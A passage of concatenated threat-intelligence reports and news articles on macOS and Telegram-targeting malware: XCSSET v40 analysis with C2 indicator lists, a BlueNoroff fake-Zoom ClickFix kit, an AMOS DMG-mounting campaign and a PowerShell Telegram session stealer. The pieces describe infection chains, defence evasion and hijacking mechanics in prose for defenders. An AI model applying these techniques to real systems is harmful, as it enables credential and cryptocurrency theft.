1 shows a benign infected Xcode project on GitHub with two separate XCSSET payloads. The XCSSET v40 infection chain consists of four distinct stages prior to final payload execution: The initial loader script establishes C2 communication The second stage collects basic fingerprinting information on the system and downloads further modules The third stage includes a temporary staging applet that is dropped onto the system to load the final stage into volatile memory space The fourth stage is the core module logic The moment this memory-resident core module loop becomes active, the malware terminates its staging processes and deletes all installation files from the disk. The goal of the core-module (internally called boot) is to execute and load additional, specialized modules into memory, such as keyloggers, clipboard hijackers or browser hijackers. Figure 2 describes XCSSET v40’s infection chain. Our analysis of XCSSET v40 uncovered 17 distinct modules, each designed for a different goal. The modules were delivered via a dynamic C2 infrastructure and executed in memory. We found that the operators have enhanced several of its legacy modules while introducing two new components. These include a Chrome hijacking backdoor and a Telegram trojanizer. We provide the full list of XCSSET v40 modules in Appendix B. The Chrome hijacking module controls the browser by misusing a legitimate Chromium feature, the CDP. For the CDP-based hijacking to work, the malware must redirect how the user interacts with the browser. It does this by wrapping the benign Google Chrome binary in a malicious persistence script. When a victim launches Google Chrome, the wrapper executes a three-step chain: The orchestrator check: First, it restarts the main XCSSET orchestrator module (boot) every time Google Chrome is initialized, ensuring the malware's core process remains active CDP execution: It then launches the legitimate Google Chrome application with specific command-line arguments that activate the CDP on a pre-defined local port, exposing the browser's internal engine chrome_remote backdoor: Finally, it drops and launches a specialized Chrome hijacking binary (chrome_remote). This binary connects to the opened CDP port, allowing the attackers to execute arbitrary JavaScript, manipulate active browser sessions and extract cookie tokens invisibly. Figure 3 illustrates the module’s infection and execution chain. Inside the chrome_remote Binary The chrome_remote binary dropped by the browser hijacking module establishes a persistent WebSocket connection to the C2 server to pull down real-time JavaScript payloads. Leveraging CDP's ability to inject code before a page even loads allows the malware to force the browser to evaluate and execute these remote scripts on every new tab or document the user opens. Once injected into a webpage, the malware’s dynamic scripts override critical browser APIs to manipulate the user's active session for the following goals: Traffic interception: Hooks placed on window.fetch and XMLHttpRequest monitor to exfiltrate sensitive data streams, credentials and API tokens Crypto wallet manipulation: Intercepting MetaMask's Ethereum provider allows the malware to alter cryptocurrency wallet addresses or manipulate decentralized application (dApp) transactions Credential theft: Overriding password-manager autofill fields captures credentials This module is able to pivot from a browser hijack to full host-level compromise, operating within the context of the legitimate Google Chrome process. The binary monitors active tabs for specific browser console logging events. If the operator wants to run a local system command on the infected machine, they execute a standardized string such as a console.log prefixed with a specific delimiter. The chrome_remote binary intercepts this console event, strips the delimiter and passes the remaining payload to the host's underlying shell handler (exec.Command). The resulting shell output is then packaged and routed back through the active CDP WebSocket to the C2 server, establishing a stealthy, fileless reverse shell. We reported the information about this threat to Google. This behavior is protected against in Windows, and Google is currently working on expanding the same protections to macOS. We identified a new Telegram Desktop trojanizer module in May 2026 that was absent from the April 2026 deployment. The delayed introduction of this module demonstrates that the threat actor was actively refining XCSSET v40 after it was already deployed in the wild. This new module performs the following activities: Downloading a pre-built malicious Telegram.app ZIP Wiping the legitimate copy Dropping the C2-supplied replacement in its place Ad hoc code-signing the fake Telegram app Issuing a kill command to the original Telegram process so the victim relaunches the trojanized copy This module was updated with a custom AES-encrypted configuration from a dedicated endpoint (/w?tr). We have observed this security mechanism in other modules in earlier iterations of the XCSSET malware family. The decrypted configuration is written to ~/.tr, and a companion ~/.tr_map file tracks state. Whenever the SHA-1 of .tr changes, .tr_map is cleared. Both files are then uploaded back to the C2 as base_tr_file.txt and base_tr_map.txt. Because the configuration blob itself was not captured during our collection window, we could not verify its exact contents. However we assess that this is how XCSSET’s operators kept server-side track of which Telegram-related markers existed on each infected host. This is not the first time XCSSET has been seen targeting Telegram. The original 2020 generation of XCSSET featured dedicated telegram / telegram_lite data-stealing modules. The 2025 XCSSET iteration included the data_folders_finder module that exfiltrated Telegram's chat history, cached files and local encryption keys. The newest Telegram trojanizer represents a meaningful escalation in the attacker’s access to the app. Rather than a one-time copy of Telegram-related data, the attacker now replaces the application binary itself, giving them an in-process foothold. When analyzing v40, it became clear that XCSSET went through architectural changes and made core changes to its TTPs. The attackers behind the malware enhanced its stealth practices to sabotage detection and thwart analysis, while also adding new persistence and data theft methods. This section highlights the recent TTPs observed in v40 illustrated in Figure 4, including: Multi-layered encryption Polymorphism New fileless persistence Impairing defenses Virtual machine (VM) evasion The architectural hallmark of XCSSET v40 is its defense-evasion framework, combining overlapping layers of polymorphism and a dual-key encryption scheme. Rather than relying on a single defensive trick, the malware implements a multi-tiered cryptographic gauntlet across its binaries, network payloads and internal source code. Figure 5 describes the XCSSET v40 evasion stack: The malware leverages polymorphism to rotate its digital fingerprints and evade detection. The loader binary, which is responsible for executing the core modules in memory, is recompiled on the C2 server every few hours. During analysis, we observed eight distinct hashes delivered to a single endpoint within a 24-hour window. The functional modules streamed to the orchestrator are polymorphic. Each component is encrypted via AES-256-CBC using a per-build key and a randomized Initial Vector (IV) prepended to the ciphertext. Because the IV shifts with every single transmission, even two identical modules served seconds apart will result in two different encrypted blobs. Figure 6 illustrates the encrypted payload injection process into osascript as detected in Cortex XDR. While previous versions of XCSSET protected their C2 communications using a single, hard-coded plaintext key, v40 introduces a dual-key architecture that separates inbound and outbound encryption. Unlike its predecessors, XCSSET v40 embeds its inbound key within the compiled AppleScript loader. As a result of this compartmentalized key placement, defenders who retrieved the outbound key from network telemetry will not be able to decrypt and access the core logic of the malware. The malware applies a third layer of polymorphism at the structural code level. Every internal string literal is dynamically encoded using a per-module keyed Caesar cipher featuring a randomized 52-character alphabet and variable shift values. As a result, no two builds of the same module share common string signatures. XCSSET v40’s developers also implemented a pre-compilation substitution cipher for all internal module, function and variable names. Because this obfuscation takes place on the C2 server before distribution, the decryption mapping is absent from the host endpoint. This absence means that analysts cannot reverse a local execution routine to reveal the original code structure. Figure 7 includes a scrambled source-code module with decrypted string literals. By leveraging advanced pattern matching and LLM assistance, we broke the identifier substitution cipher. This allowed us to trace the obfuscated module and function names back to their original, operator-assigned names. This allowed us to dive into the malware’s core logic. XCSSET adopted new technologies to scale their operations. This can also be a reminder for the threat intelligence community that defenders can harness those same capabilities to neutralize this threat. Beyond introducing polymorphic capabilities, XCSSET v40 also added a new fileless persistence to its TTPs. In addition to its usual persistence through Git hooks, Launch Daemons and trojanized applications, v40 adopted another method that misuses the macOS defaults configuration system. Defaults is the macOS counterpart to the Windows Registry, which is a built-in mechanism for managing user preferences and application settings. Historically, macOS malware families like NetWire and FruitFly have misused the defaults utility to store state data. XCSSET v40 instead uses this utility to shift from predictable, disk-resident persistence to a fileless re-infection loop. Rather than dropping additional scripts on disk between cycles, XCSSET v40 writes a Base64-encoded staging payload into a preferences domain it generates per host. Inside the domain, the malware writes the payload under keys that are meant to seem random, like mpirv_eahpi_apm or ychax_muwch_ucy. When a victim launches a trojanized or hijacked application, the threat runs a one-liner to retrieve and decode the payload: The decoded blob re-infects the host, with the SRC tag identifying which infection vector (e.g., hijacked browser, infected Xcode project or trojanized application) is responsible for triggering the re-arm. Beyond standard persistence, XCSSET v40 uses the defaults system during initial infection to store and query system information. Misusing defaults as an operational configuration cache is uncommon in the macOS malware landscape. XCSSET v40 also introduces significant defense-evasion techniques that were not observed in prior campaigns. In this multi-part effort to thwart Apple’s defenses, XCSSET v40: Disables the SoftwareUpdate configuration channel Terminates cloud telemetry mechanisms Locks XProtect signature databases Resets the Transparency, Consent and Control (TCC) framework’s databases XCSSET v40 executes the following commands to hinder the machine’s ability to receive security updates: Setting these values to false prevents the endpoint from automatically retrieving updates to crucial macOS signature databases like: XProtect MRT TCC This also prevents access to Apple's Rapid Security Response channel, which delivers emergency patches between full macOS releases. XCSSET v40 runs a constant loop that hinders the endpoint’s ability to send security-related data through the CloudTelemetryService process. This evasion method blocks the transmission of local security telemetry to Apple, ensuring that the operator's tooling is not sampled into subsequent XProtect signature releases. The malware spawns a Perl process that tries to acquire and hold access to the endpoint's YARA-rule database (XPdb). This exclusive file lock on the XProtect signature database ensures that if the endpoint does receive a security update, its content could not be written to disk. Prior XCSSET versions terminated module execution when the user denied AppleEvents automation prompts. XCSSET v40 instead invokes tccutil reset AppleEvents, which clears the user's TCC decision database for the AppleEvents service. It then reloads a TCC prompt, masquerading as System Settings or Xcode to trick the user into re-granting automation permissions to the malware's bundle ID. The subsequent automation request is treated as a first-time prompt, redisplaying the consent dialog. XCSSET v40 also attempts to avoid running on VMs. Upon execution of the stats module (one of the first modules downloaded to the machine), the module generates a set of checks on the machine’s CPU and hardware metadata. This check is to determine whether or not the infected endpoint is a VM. Once the module performs those checks, it calculates a final verdict ("Model Identifier suggests VM: false", "Result: likely physical") and ships the results over to the C2. Hosts reporting a virtual environment receive no further module deliveries, ensuring that automated sandboxes do not analyze XCSSET’s core logic. By analyzing XCSSET v40’s Uniform Resource Identifier (URI) structure and domain registration strategies, we were able to learn more about the timeline of the most recent campaign. We even found several operational security (OPSEC) failures that provided insights into the attacker’s strategies and capabilities. XCSSET v40 shows a clear pattern of URL endpoint structure throughout the campaign, assigning distinct functionality to each URI endpoint as shown in Table 1. Table 1. XCSSET v40 URI endpoint breakdown. XCSSET v40's C2 infrastructure reveals a distinct domain registration strategy. In early 2026, the attackers registered about 40 different domains in at least four short bursts across a small pool of IP addresses. The operator staged and aged these domains months before launching the attack wave, to bypass detection of newly registered domains. Geographically, the attackers’ targeting parameters and naming conventions have also evolved. While the 2025 campaigns relied on [.]ru (Russia) domains masquerading as legitimate content delivery networks (CDNs) and tech properties, the 2026 attack wave introduced [.]in (India) names registered alongside identical [.]ru siblings. This geographic infrastructure pivot aligns with recent victimology, matching our observations of XCSSET v40 targeting developers across South Asia. OPSEC Failures Despite mitigating detection risks by aging their domains, the attackers compromised their own campaign through poor OPSEC. Specifically, they cross-contaminated the IP addresses hosting those domains across different XCSSET campaigns. Furthermore, all four operator IP addresses are linked by a single shared SSL thumbprint (6e480d648fa1b70612f5d198a66875e28847547d), reused SSH keys and a shared self-signed remote desktop protocol (RDP) certificate. Defending against XCSSET v40 requires defenders to use real-time behavioral enforcement to flag runtime irregularities. Unit 42 suggests the following mitigations to detect and prevent this threat: Implement AI-enhanced process anomaly detection capable of flagging runtime irregularities, specifically monitoring for abnormal AppleScript instances Monitor browser launcher paths and block unauthorized file-write activity Identify and block the creation of abnormal local system defaults domains and their modification through the defaults utility Track ad hoc signed applications and untrusted local code signers, immediately isolating binaries that bypass native Apple Gatekeeper requirements Implement automated supply-chain dependency scanning to intercept poisoned open-source repositories before they are pulled into internal developer pipelines The latest XCSSET version demonstrates a persistent and specialized threat within the macOS landscape. Rather than relying on conventional delivery methods, the framework turns legitimate developer workstations into automated, self-propagating supply chain vectors. The discovery and analysis of XCSSET v40 reveals a modular framework for exfiltrating data, subverting system security and performing persistent browser hijacking. While the malware's historical reliance on AppleScript and bash stagers remains consistent, v40 introduces a significant technical evolution in defense evasion. By adopting a largely memory-resident and polymorphic architecture, XCSSET v40 leaves a minimal disk footprint. Because adversaries are now using AI-enhanced pipelines to generate polymorphic code on the fly, defenders must shift to AI-driven behavioral analysis to identify unusual or suspicious process chains and flag anomalous use of built-in detection mechanisms. Palo Alto Networks customers are better protected from the threats discussed above through the following products: Cortex XDR and XSIAM At the endpoint level, Cortex XDR blocks XCSSET on macOS hosts using Behavioral Threat Protection (BTP) to terminate fileless, in-memory execution chains—including suspicious osascript calls, multi-pass base64/xxd decoders, and process spawning from infected .xcodeproj build phases—while Advanced WildFire inspects and blocks payloads on disk. At the Security Operations level, Cortex XSIAM correlates these host-level detections with developer repository, network, and identity telemetry, providing SOC analysts with a unified attack narrative and automated playbooks to stop cross-environment supply-chain propagation. Advanced URL Filtering and Advanced DNS Security Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious. If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42) UK: +44.20.3743.3660 Europe and Middle East: +31.20.299.3130 Asia: +65.6983.8730 Japan: +81.50.1790.0200 Australia: +61.2.4062.7950 India: 000 800 050 45107 South Korea: +82.080.467.8774 Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance. accapple[.]ru adschecks[.]ru adschecks.ru adsmobi[.]ru adsmorein[.]in adsmoreme[.]in amdcdn[.]ru amzndev[.]in amzndev[.]ru amznprod[.]in applecdn[.]ru appledisk[.]ru appledns[.]ru applehosts[.]ru appletime[.]in bulksec[.]ru cdnamz[.]in cdnamz[.]ru cdnapple[.]in cdnatapple[.]ru cdnroute[.]ru checkcdn[.]ru chromeads[.]ru cnmag[.]ru devnetaps[.]ru dnsapple[.]ru dnsrelays[.]ru explorecdn[.]ru fiddlejoy[.]ru figmacat[.]ru figmanets[.]in funchats[.]ru gironetcdn[.]ru goalmate[.]ru googlenets[.]ru greencn[.]ru icloudsnet[.]ru imails[.]ru legalads[.]in littleads[.]in littledns[.]ru maganet[.]ru mindelgate[.]ru netapsdev[.]ru netcdnads[.]in netcdnamz[.]ru netcdndev[.]in netcorps[.]ru netsprot[.]in netsproto[.]in networkads[.]in rigacdn[.]in rigmajoys[.]in rigmanet[.]ru rigmanets[.]in sahusuzuki[.]in stuffdns[.]in testjoys[.]ru timewebnet[.]in vigmanet[.]ru whitead[.]in whiteads[.]ru wincdn[.]ru windsecure[.]ru C2 URLs - Chrome CDP Helper Binary hxxps[:]//amzndev[.]in/d/zw_sfp64 hxxps[:]//amzndev[.]ru/d/zw_sfp64 hxxps[:]//googlenets[.]ru/d/zw_sfp64 hxxps[:]//netcdndev[.]in/d/zw_sfp64 hxxps[:]//whitead[.]in/d/zw_sfp64 hxxps[:]//whiteads[.]ru/d/zw_sfp64 91.108.106[.]229 95.142.35[.]34 95.142.35[.]206 95.142.37[.]159 151.243.109[.]188 178.208.92[.]129 178.208.92[.]168 6e480d648fa1b70612f5d198a66875e28847547d XCSSET Mac Malware: Infects Xcode Projects, Uses 0Days – Trend Micro XCSSET evolves again: Analyzing the latest updates to XCSSET’s inventory – Microsoft New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects – Microsoft NetWire Analysis – Objective-See FruitFly Analysis – Objective-See Chrome DevTools Protocol– Developer The infection lifecycle of XCSSET v40 can be categorized into four phases, as detailed below. The infection lifecycle begins when a developer opens a poisoned Xcode project, typically downloaded from GitHub or built internally: The moment the developer builds the project locally, a malicious run-script phase executes silently in the background The malware dynamically scrambles its payload generation at compile time, switching between nested layers of Hex- and Base64-encoding This decoded script initiates contact with the attacker’s C2 infrastructure by executing a curl request to the /a with basic execution context (p=xcode_phase) to retrieve the next stage The retrieved staging payload runs a second, specialized curl command that collects and exfiltrates primary host metadata The payload queries the operating system type (uname -s) and the current username (whoami), transmitting these details back to the C2 endpoint If the C2 approves the host profile, it returns a bash script obfuscated via a custom substitution cipher. This script handles the high-risk task of staging the main loader while covering its tracks: The bash script performs deeper hardware fingerprinting, matching the host's serial number against targeted profiles It then pulls the primary malware loader to /tmp/r and compiles an accompanying AppleScript wrapper as /tmp/p.app on the fly To eliminate forensic evidence, the loader wrapper is executed in memory by osascript, which in turn downloads the main orchestrator module and its AppleScript loader After execution, the malware terminates osascript and deletes both /tmp/r and /tmp/p.app from the disk to minimize its forensic footprint Phase 4: Orchestrator and Core Logic Modules Once it erases its disk footprint, the malware transitions to a mostly fileless execution: The main orchestrator module named “boot” by the developers runs and retrieves additional module payloads from https:// /s/ Finally, the orchestrator pipes the payloads to the AppleScript to decrypt and execute the modules in memory This appendix maps the 17 modules identified in XCSSET v40. We correlated the canonical XCSSET v40 module names recovered through our decryption efforts with the terminology used in the three prior public reports. Please note that since XCSSET has gone through major architectural changes in v40, some modules’ logic may be expanded or split into different modules. It is also worth noting that previous reports of XCSSET did not decrypt the original module names, and therefore they appeared as jumbled strings.
unit42.paloaltonetworks.comJul 31, 2026extracted
BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery
The North Korean threat actors behind the ClickFix-style campaigns that employ typosquatted Zoom and Microsoft Teams domains have been found to operate an active phishing kit to impersonate the videoconferencing platforms in social engineering campaigns designed to deliver malware. "BlueNoroff has operationalised trust abuse by combining compromised industry contacts, social engineering, wallet reconnaissance and malware delivery into a repeatable victim acquisition pipeline," JUMPSEC said in a detailed report shared with The Hacker News. "The platform profiles victims' cryptocurrency wallets before malware delivery, enabling selective targeting of high-value victims." Describing the campaign as an operator-driven victim acquisition platform, the cybersecurity company noted that the activity involves using compromised trusted contacts as the initial access vector to create a self-propagating attack chain via Telegram. Details of the activity have been documented in detail since early 2025, with Sekoia tracking a second related North Korea-aligned threat cluster under the moniker ClickFake Interview owing to the use of ClickFix-like lures to deceive unsuspecting targets into running malicious commands under the pretext of addressing camera or audio issues. According to JUMPSEC, the lure links are distributed from an account the target already trusts and has met in real life, with the attackers hijacking legitimate Telegram accounts of individuals in the cryptocurrency space to message high-ranking employees of major companies and share a Calendly meeting link. "Every victim who runs the payload with Telegram Web open or Telegram Desktop installed is a candidate for their Telegram session to be stolen and reused against their own contacts," JUMPSEC said, describing the self-sustaining nature of the campaign and how one account compromise feeds the next. The Calendly link takes the victim to what appears to be a Zoom meeting URL, but, in reality, is a fake domain impersonating the videoconferencing service. Users who land on the phishing page are prompted to enter their name and grant it permissions to access the webcam. However, once the permissions are provided, the webcam stream is stealthily sent to the operators' panel via mediasoup WebRTC. In the final stage, after the victim joins the meeting, they are shown another page where they seem to be in a Zoom call all by themselves, along with the message "waiting for other participants." This sets the stage for the next phase of the attack. "Once the victim has joined, the operator can then continue to use their panel in order to control the meeting, send fake 'your mic isn't working' messages, and trigger the 'Zoom SDK Update,' ultimately resulting in the ClickFix payload," JUMPSEC said. Simultaneously, the kit executes a fingerprinting step on the web browser to inventory the cryptocurrency wallets installed on it, after which the "admin" joins the fake meeting. The twist here is that the video the victim sees isn't a live stream, but rather a pre-edited video that features AI-generated headshots created using OpenAI ChatGPT and superimposed over authentic body movements captured during previous meetings. "So, each successful attack feeds source material into the composites used against the next target," JUMPSEC explained. "This combined with the Telegram account takeover method means that the fake meeting shows a plausibly familiar-looking face, moving with the body language of someone who was actually captured on camera." The cybersecurity company said it captured two distinct lure variants, each for Zoom and Microsoft Teams. The Teams variant is assessed to be more polished than the Zoom version, supporting emoji reaction, mobile/tablet blocking, and advanced wallet probes prior to malware delivery. The ClickFix attack chains are compatible with both Windows and macOS. A brief description of each of them is as follows - Windows kill chain: - The ClickFix command runs a PowerShell loader that downloads and executes a VBScript, disables Microsoft Defender, adds "C:\Users" folder to the exclusion path, and force-restarts Defender so that the exclusions are applied. - The VBScript implant checks for the presence of Telegram Web-related files within Google Chrome, Microsoft Edge, Brave, and Mozilla Firefox profile directories, likely to determine if the victim has an active Telegram account and potentially hijack the account's session cookies in order to take control of the account and use it to target other individuals of interest. - The implant enumerates installed extensions across Chrome, Chrome Beta, Chrome Dev, Chromium, Edge, Brave, Opera, Opera GX, Vivaldi, and Firefox, reports their corresponding extension IDs, which are then matched against known wallet extensions like MetaMask to identify high-value targets. - The implant also supports the ability to deliver next-stage payloads, although their exact nature remains unknown. macOS kill chain: - The ClickFix command runs a shell script, which then downloads a fake Teams (or Zoom) installer. - The installer runs the main stealer payload to extract and exfiltrate sensitive data, including system metadata and Google Chrome master keys from the iCloud Keychain, to the attacker via a Telegram channel named "Aurora," and deploy additional payloads. Further analysis has determined that the Telegram exfiltration function hard-codes the bot token and chat ID within the stealer binary. Querying the Telegram API for the bot token has linked it to an operator who goes by the name "John" (@alchemy_john_mac). As recently as May 2026, the individual has been observed asking admins of the MAIV cryptocurrency group about vesting contracts and withdrawing their funds. On top of that, an examination of the threat actor infrastructure has led to the discovery of five distinct versions of the phishing kit from May 31 to July 14, 2026, indicating active development and fine-tuning efforts. A notable aspect of the campaign is its specific focus on lures related to Zoom and Teams, as opposed to, say, Google Meet. Sean Moran, head of threat research and enablement at JUMPSEC, told The Hacker News that there are three possible reasons behind this behavior: ClickFix pretext, target-application fits, and the typosquatting surface - "The whole hook is the 'Zoom/Teams SDK out of date' - that only lands on platforms that victims believe have somewhat of a heavyweight desktop client (like Teams and Zoom have). But Google Meet doesn't have a desktop application and is browser-first, so it doesn't really make sense there. Zoom and Teams are the default for a lot of crypto/venture capitalist/founders in the finance world - whereas Google Meet feels more of a customer calling platform rather than an "investor/partnership call." The entire domain scheme being 'us.zoom.06webin.us' and such makes it really easy for someone to fall for their fake links because they are so similar to real Zoom links with all the sub-domains, whereas 'meet.google.com' is harder to typosquat/spoof." Moran also pointed out that while the phishing kit currently only ships Zoom and Teams lure pages, there does exist a Google Meet equivalent as an unimplemented stub in the source code. This, he added, is likely a deliberate choice for the above-mentioned factors and the fact that the current set up is actively working. "The implications extend beyond this specific campaign. As Web3 and digital assets continue to mature, threat actors are increasingly recognising that compromising the individuals who control access can be as valuable as attacking the infrastructure itself," JUMPSEC concluded. "BlueNoroff's continued refinement demonstrates that organizations must consider identity, relationships, and communication channels as critical parts of their security posture."
thehackernews.comJul 24, 2026extracted
New macOS ClickFix attack silently mounts DMGs to push infostealer
A new macOS ClickFix campaign is using Terminal commands to silently download, mount, and launch info-stealing malware from malicious disk image (DMG) files. The campaign is infecting Mac devices with the Atomic macOS Stealer (AMOS) infostealer, which steals browser credentials, cryptocurrency wallet data, Keychain data, messaging app information, and user documents. Researchers at Palo Alto Networks Unit 42 first discovered the campaign and say it begins with a fake CAPTCHA page that tells users to open Terminal and paste a malicious command to verify themselves. Once executed, the command downloads a DMG file from an attacker-controlled server, silently mounts it with macOS's native hdiutil utility, locates the application bundle it contains, and launches it automatically. ClickFix is a social engineering technique that displays fake CAPTCHAs, browser errors, or system alerts to trick visitors into copying and executing attacker-supplied "fix instructions." The technique has grown in popularity among threat actors in the past year and has been used by both cybercriminals and state-sponsored hacking groups to distribute malware. While ClickFix attacks involving DMGs are not new, previous campaigns typically relied on users manually opening downloaded DMG files to launch malicious applications or execute scripts from attacker-controlled servers. The campaign spotted by Palo Alto combines both approaches by using a Terminal command to quietly download a DMG file and launch the malware it contains. After running the Terminal command, the attack downloads a malicious DMG from svs-verificationdate[.]beer using curl with the quiet "-fsSL" flags and saves it to the /tmp folder under a random filename. The command then executes 'hdiutil attach -nobrowse' to mount the downloaded disk image without displaying it in Finder or on the desktop. The script then searches up to three directory levels deep for the first available .app or .pkg installer, and if one is found, launches it using the macOS open command. Researchers observed the malware being delivered as a disk image named "s.01M0td.dmg," which mounted a volume containing a self-signed application bundle named "NNApp.app." This payload is part of the Atomic macOS Stealer family, which is used to steal credentials, browser history, authentication tokens, and cryptocurrency wallets from infected devices. The stealer will display a fake System Preferences authentication prompt that asks the user to enter their password, allowing the malware to steal it. According to the researchers, the malware targets eight Chromium-based browsers, including Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals cookies, login databases, autofill information, stored payment cards, and browser profile data. The stealer also targets Firefox-derived browsers, including LibreWolf, SeaMonkey, Tor Browser, Waterfox, and Zen Browser, stealing the same information. Palo Alto says the malware searches for and steals cryptocurrency wallet data, including Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. The malware also steals Telegram Desktop and Discord data, Apple Notes databases, Safari cookies, Apple Keychain database files, and user documents with the PDF, TXT, or RTF extensions. All harvested data is then stored in a ZIP archive and uploaded to the attacker's server, where the attacker can retrieve it. Of particular interest, the researchers found that the malware will replace legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to perform crypto theft. The campaign was observed using command-and-control servers at svs-verificationdate[.]beer and 196.251.107[.]171. As a general rule, users should always be cautious when websites instruct them to open Terminal and execute commands. This is especially true when they claim to be part of CAPTCHA verifications, browser fixes, or other troubleshooting steps. If you do not 100% understand what a command does, do not run it. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJun 23, 2026extracted
How hackers use PowerShell scripts to steal Telegram accounts | Kaspersky official blog
There are dozens of ways to break into someone’s Telegram account. We’ve frequently covered phishing in Telegram Mini Apps, scams with bots, gifts, and giveaways, and many other tactics. Today, we’re looking at yet another account hijacking method — one that relies on a PowerShell script. The script, deceptively named “Windows Telemetry Update”, actually serves as a tool for hijacking Telegram sessions. It harvests data from completely defenseless computers and forwards it to the attackers via a Telegram bot. An evil script with a stealer inside Cybercriminals frequently rely on PowerShell scripts to covertly download malware or harvest data. This time, researchers uncovered a script on Pastebin masquerading as a routine Windows update. In reality, it was an infostealer designed to hijack Telegram for Windows session data, and allow hackers to take over accounts with neither a password nor verification code. What’s a PowerShell script anyway? Think of it as a text file packed with commands for a Windows computer. Instead of a human spending time clicking through tasks manually, the computer follows these quick instructions to get everything done automatically in a matter of seconds. Right at the top of the script, researchers immediately spotted a Telegram bot token and a chat ID, alongside multiple references to the tdata folder. This specific folder is where Telegram for Windows keeps the authorization keys used to log users in to its servers. If attackers grab this data, they can access the victim’s Telegram account without a password or verification code. Once inside, they maintain access until the victim checks their active sessions in the app and manually terminates the suspicious ones. How the stealer works The malware lands on the victim’s computer disguised as a PowerShell script for a Windows telemetry update. As soon as it runs, it gathers basic system information: username, hostname, and public IP address. It then checks if Telegram Desktop is installed. If it is, the script forces the app to close so it can unlock Telegram files for editing. From there, the rest is simple: the script zips up the entire contents of the tdata folder into a temporary directory, forwards the archive straight to the attackers, and wipes the file from the computer to hide its tracks. The good news is that the stealer likely hasn’t compromised any accounts yet, as experts found no evidence of actual data transfers. It appears researchers caught this malicious PowerShell script while it was still in the prototype testing phase. Another giveaway is its surprisingly suspicious name. Cybercriminals typically use neutral names to hide their bots and apps. In this case, when researchers found it, the bot was running under the burner handle afhbhfsdvfh_bot with a dead-honest description: Telegram attacker. Researchers noted that while the bot had likely undergone functional testing, it hadn’t yet been deployed at scale, which explains the placeholder name. How to defend against PowerShell scripts Defending against this nameless stealer requires a layered approach to security. First, it helps to understand how a PowerShell script ends up on your PC in the first place. Usually, they slip in unnoticed through malicious email attachments, software vulnerabilities, infected apps, or social engineering tricks. That’s why we recommend installing a robust security suite on your device and staying highly cautious about the links you click and the files you download. Be careful what you download. Always double-check the websites you use to download files. Stick to trusted, official sources — and remember that Telegram and Discord channels, and sketchy, fly-by-night websites definitely don’t fit that description. Watch out for email links and attachments. Keep in mind that email remains a favorite delivery method for cybercriminals. They might drop a PowerShell script directly into your inbox as an attachment or bait you into clicking a link that triggers an automatic download. Keep your apps and OS updated. Software vulnerabilities pop up unexpectedly, but patches are usually released very quickly. We recommend installing updates as soon as they become available. To make life easier, just turn on automatic updates wherever possible. Be sure to install Kaspersky Premium on every device where you run Telegram. Our security solution will block malware, malicious attachments, spam, phishing attempts, and sketchy websites. Kaspersky Premium subscription additionally includes a password manager. It generates and securely stores strong and unique passwords, stops you from entering your credentials on fake sites, and comes in handy for tightening your Telegram security, which we’ll cover next. How to secure your Telegram account To protect your Telegram account from these types of hijacking schemes, we recommend the following: Regularly monitor your Telegram activity. Ultimately, hackers steal accounts to blast out spam and run scams. It’s a good idea to occasionally check your chat history to ensure no new conversations or messages have appeared that you didn’t send yourself. Immediately terminate unrecognized sessions. If you suspect you’ve fallen victim to this infostealer or any other cyberattack, terminate all other Telegram sessions as soon as possible by going to Settings → Devices → Terminate all other sessions. If your Telegram account has already been hijacked, you have a 24-hour window to kick the attackers out by terminating their sessions. We broke down exactly why this rule exists — and mapped out every possible way to reclaim your account — in our detailed guide: What to do if your Telegram account is hacked. In the meantime, beefing up your account security is a must. First, set up a cloud password by heading to Settings → Privacy and Security → Two-Step Verification. Just any password won’t cut it — you need something unique and unhackable. We recommend reading our post on the subject: Creating an unforgettable password. Better yet, make the switch to passkeys — a passwordless technology that offers top-tier protection against leaks and phishing. To set up that login method, go to Settings → Privacy and Security → Passkeys. The easiest way to manage your passkeys is with Kaspersky Password Manager. Our cross-platform app ensures you can seamlessly log in to Telegram using your saved passkeys whether you’re on Windows, Android, iOS, or macOS. To learn more about how cybercriminals can breach your Telegram account and how to lock it down, check out our other posts:
kaspersky.comJun 23, 2026extracted
North Korean Hackers Are Turning Developer Tools Into Malware Delivery Channels
Cybersecurity researchers have flagged two malicious cyber campaigns that exhibit similarities with a persistent North Korean threat cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). According to a report published by Proofpoint, the threat actor has been found orchestrating phishing campaigns using developer role recruitment or code review themes to target nearly 100 organizations in finance, cryptocurrency, education, technology, and several other sectors. The activity has been codenamed UNK_DeadDrop. "The infection chain begins with emails containing links to actor-controlled GitHub repositories hosting malicious scripts that result in the execution of cross-platform malware for macOS, Linux, and Windows, including an open-source Go framework named Overlord," Proofpoint researchers Saher Naumaan and Carlos Rubio said. A crucial aspect connecting the campaign to Pyongyang is the use of Microsoft Visual Studio Code (VS Code) projects that employ the "runOn: folderOpen" technique to trigger the execution of malicious code every time the code editor is opened without requiring any user interaction. This approach has been adopted by the Contagious Interview actors since December 2025. The activity documented by the enterprise security company involved more than 250 emails that were sent during a six-week period to individuals in almost 100 organizations. Over 75% of the targeted entities are located in the U.S., followed by the U.K., Australia, France, Brazil, Germany, India, Israel, Japan, and the Netherlands. The emails contain links to GitHub repositories masquerading as technical assignments or cryptocurrency-related projects, instructing recipients to clone the repository and open it in VS Code or Cursor, resulting in the execution of operating system-specific malware loaders for Linux, macOS, and Windows. Subsequent lures observed in May 2026 have pivoted their approach by requesting targets to review their open-source projects. The loader - a shell script for macOS and Linux and a VBScript for Windows systems - is designed to install a malicious VS Code extension (VSIX) that masquerades as a legitimate Google service, while communicating with an external server to facilitate remote command execution, system reconnaissance, and data 